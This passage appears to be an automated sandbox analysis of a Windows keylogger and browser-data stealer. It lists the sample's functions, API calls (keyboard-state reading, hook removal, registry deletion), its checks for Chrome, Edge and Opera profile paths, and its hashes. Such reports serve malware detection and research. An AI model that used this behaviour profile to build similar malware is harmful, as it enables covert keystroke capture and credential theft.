                                • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CloseHandle.KERNEL32(?), ref: 00409FFD
                                • UnhookWindowsHookEx.USER32 ref: 0040A010
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040A597
                                  • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                  • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                  • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                  • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                  • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                  • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                • String ID: [AltL]$[AltR]
                                • API String ID: 3195419117-2658077756
                                • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040A5F1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: 6h@
                                • API String ID: 2654517830-73392143
                                • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                • GetLastError.KERNEL32 ref: 0043B4E9
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19